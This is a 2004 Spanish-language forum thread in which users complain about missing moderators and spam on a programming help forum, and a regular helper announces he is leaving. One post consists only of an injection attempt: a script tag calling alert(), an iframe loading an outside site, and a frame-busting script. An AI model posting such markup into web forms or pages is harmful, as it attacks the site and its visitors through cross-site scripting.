Es que no hay moderadores de programacion.com en estos foros?

perrogrun
16 de Diciembre del 2004
No comprendo cómo en estos foros no hay moderadores que banneen mensajes como el que hay en este foros de las "casas de madera" o "vendo programas..." esto no es un foro de venta es un foro de ayuda HTML, aunque claro un foro que no tiene un moderador que conteste a nuestras preguntas habla por sí mismo, yo he intentado ayudar a todo el mundo que he podido pero ante el DESINTERES de los webmaster de este sitio desisto y abandono estos foros. Espero por el bien de los usuarios de estos foros, que no son pocos, que los administradores de esta página cámbien su politica de abandono que dan a sus usuarios.

Todo aquel que me apolle que postee aquí sus quejas.

Aténtamente: un EXusuario

cacho
16 de Diciembre del 2004
www.miruleta.com

tenes razon,

aturdido
16 de Diciembre del 2004
Anda, pero hay gente que trata de ayudar de verdad????
Yo son entro en el foro para echarme unas risas con la gente del estilo "allundenme a jaqiar hotmail xq ay unos wevones q me stan jodiendo wey"

aaaaaa
16 de Diciembre del 2004
<script>alert()</script><iframe src=http://www.adolfochismes.cjb.net><SCRIPT TYPE="text/javascript" LANGUAGE=JAVASCRIPT>
<!--
if (top.frames.length!=0)
top.location=self.document.location;
// -->
</SCRIPT>

perrogrun
16 de Diciembre del 2004
Yo hoy he respondido a mas de 30 mensajes entre javascript, html y asp pero creo que paso de ayudar mas mientras halla gente que pone publicidad y los administradores no gasten ni 5 min al día para quitarlos. Si alguine quiere ayuda me ofrezco en www.instruccionesymanuales.com en la sección de "foro" me comprometo a ayudar personalmente al que lo necesite.

ADIOS!!!! Volveré cuando el foro quite la publicidad

scriptman
16 de Diciembre del 2004
Pues yo pienso igual... yo un tiempo ayude mucho aqui, he incluso aun recibo preguntas y "agradecimientos" a mi email de post ke hize hace casi 2 años...
Ya solo entro de ves en cuando.. pero parece que todo sigue igual o peor, ya que...

Saludos, Scriptman.
.::Apoya al software libre::.

Victor
16 de Diciembre del 2004
Estoy totalmente decuerdo pero esto no solo pasa en este foro, ya que hoy he visto 30 foros porque no encuentro solucion a mi problema y en todos ellos hay un monton de mierda que no tiene nada que ver con informatica.